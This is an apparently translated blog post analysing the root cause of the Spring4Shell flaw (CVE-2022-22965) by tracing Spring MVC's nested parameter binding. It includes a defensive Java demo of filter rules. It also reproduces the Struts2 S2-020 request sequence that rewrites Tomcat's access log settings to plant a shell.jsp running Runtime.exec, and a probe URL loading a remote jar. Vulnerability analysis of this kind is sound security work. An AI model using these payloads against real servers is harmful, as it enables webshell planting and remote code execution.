A Brief Look at the Root Cause of CVE-2022-22965 (Part 6)
Preface: this records my own path into Java security, tidies up the train of thought, keeps the theory light, and focuses on debugging.
The series has four parts:
Introduction: sorting out the background of CVE-2022-22965
Basics: reviewing some fundamentals of Java
Debugging: reading part of the Spring MVC source code
Analysis: analysing the root causes of CVE-2010-1622 and CVE-2022-22965
Analysis
(Continuing from "A Brief Look at the Root Cause of CVE-2022-22965 (Part 4)": reproduce CVE-2022-22965 and analyse its root cause.)
CVE-2022-22965 vulnerability analysis
1. The attack technique from the Struts2 S2-020 issue
Only the idea matters here; the technique used in CVE-2022-22965 is the same. The payload is as follows:
// change the root directory the file is written to
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
// change the name of the written file
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
// change the extension of the written file
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
// change the file date format, used to switch directory
http://127.0.0.1:8080/FirstStruts2/login?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=2
// accessing shell.jsp will be recorded in the log
http://127.0.0.1:8080/FirstStruts2/shell.jsp?=<%Runtime.getRuntime().exec("calc");%>
Having followed the debugging in the earlier parts, this payload should raise no questions, so I will not go over it further.
With a Spring MVC project deployed to Tomcat (or a Spring Boot executable jar with its embedded web server), adding one more "module" segment to the payload is enough to write a log file, and in jsp format at that.
With a small change, use the payload below and request it (it has no attack effect) to see how Spring MVC 5 recursively resolves the request parameter, obtains each PropertyDescriptor, and in the process bypasses Spring's official fix for CVE-2010-1622:
http://localhost:8090/SpringMVC5/level/info?class.module.classLoader.URLs=jar:http://localhost:9999/test.jar!/
2. Debugging the recursive resolution of request parameters in Spring MVC 5
Starting from DataBinder
DataBinder calls AbstractPropertyAccessor's setPropertyValues method, which iterates over every parameter and resolves each one in turn. We passed only a single request parameter that needs recursive resolution, so setPropertyValues performs just one iteration.
AbstractPropertyAccessor calls AbstractNestablePropertyAccessor's setPropertyValue method, which contains the logic for resolving request parameters of the nested form "var1.var2.var3.var4.var5".
Resolving the "class" segment (traced in the debugger; screenshots in the original post).
Resolving the "module" segment (traced in the debugger; screenshots in the original post).
Resolving the "classLoader" segment (traced in the debugger; screenshots in the original post).
Assigning the value to class.module.classLoader.URLs[] (traced in the debugger; screenshots in the original post).
The first parameter has now been fully resolved.
3. Why the bypass works
This is the crux. The original interception rule was: when the introspected bean is Class and the PropertyDescriptor obtained is classLoader, CachedIntrospectionResults must not cache that classLoader PropertyDescriptor. JDK 11, however, brings the Module feature: when the introspected bean is a Module instead, CachedIntrospectionResults is free to cache the classLoader PropertyDescriptor, because the rule only ever looked at Class.
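To make the bypass concrete, here is a small Java program, added for this write-up and not taken from Spring or the original post, that walks the nested path class.module.classLoader one PropertyDescriptor at a time (as AbstractNestablePropertyAccessor does) and applies a filter at every hop. OLD_RULE models the CVE-2010-1622 fix that only hides Class#classLoader and therefore never looks at the Module hop; TYPE_RULE hides any ClassLoader- or ProtectionDomain-typed property on whichever bean exposes it, which is the defensive idea behind the later Spring fix. The class name and both rule names are my own, and it needs JDK 9 or later because of Class#getModule.

```java
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.security.ProtectionDomain;
import java.util.function.BiPredicate;

// Illustrative code, not Spring's implementation: a property-path walker with a pluggable filter.
public class NestedPathFilterDemo {

    // Pre-fix rule: only the classLoader descriptor of java.lang.Class is hidden.
    static final BiPredicate<Class<?>, PropertyDescriptor> OLD_RULE =
        (bean, pd) -> !(bean == Class.class && "classLoader".equals(pd.getName()));

    // Type-based rule: the hosting bean no longer matters, only the property's type.
    // (Spring's actual fix additionally limits java.lang.Class to its name properties.)
    static final BiPredicate<Class<?>, PropertyDescriptor> TYPE_RULE = (bean, pd) -> {
        Class<?> t = pd.getPropertyType();
        return t == null || !(ClassLoader.class.isAssignableFrom(t)
                              || ProtectionDomain.class.isAssignableFrom(t));
    };

    // Returns the class name of the object reached, or "BLOCKED:<segment>" / "MISSING:<segment>".
    static String walk(Object root, String path,
                       BiPredicate<Class<?>, PropertyDescriptor> filter) throws Exception {
        Object current = root;
        for (String segment : path.split("\\.")) {
            PropertyDescriptor pd = find(current.getClass(), segment);
            if (pd == null || pd.getReadMethod() == null) return "MISSING:" + segment;
            if (!filter.test(current.getClass(), pd)) return "BLOCKED:" + segment;
            current = pd.getReadMethod().invoke(current);   // step to the next bean in the chain
        }
        return current.getClass().getName();
    }

    // Same lookup Spring performs via java.beans: find the descriptor for one path segment.
    static PropertyDescriptor find(Class<?> beanClass, String name) throws Exception {
        for (PropertyDescriptor pd : Introspector.getBeanInfo(beanClass).getPropertyDescriptors()) {
            if (pd.getName().equals(name)) return pd;
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        // Any application bean works as the root: its Module is loaded by the app class loader.
        Object bean = new NestedPathFilterDemo();
        String path = "class.module.classLoader";
        System.out.println("old rule : " + walk(bean, path, OLD_RULE));  // never inspects the Module hop
        System.out.println("type rule: " + walk(bean, path, TYPE_RULE)); // rejects the ClassLoader-typed hop
    }
}
```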
Closing remarks:
I analysed this vulnerability back in April, but for various reasons only got around to writing it up now; many interesting details were forgotten along the way, and with finals approaching and everything piling up, a lot of the finer points were never filled in.
Also, this article focuses on tracing the whole code execution path through debugging rather than on how to attack; using the payload depends on the environment Spring is deployed in and on finding an exploitable chain. (PS: I don't fully understand that part myself.)
Recommended reading:
光闪's "深入理解Spring MVC源代码" (In-Depth Understanding of the Spring MVC Source Code)
P牛's "Java安全漫谈" (Java Security Talks)
yiran4827's analysis of Struts2 S2-020 command execution under Tomcat 8
https://cloud.tencent.com/developer/article/1035297
Ruilin's write-up of the SpringMVC framework arbitrary code execution vulnerability
http://rui0.cn/archives/1158
麦兜's analysis of the Spring remote command execution vulnerability
https://paper.seebug.org/1877/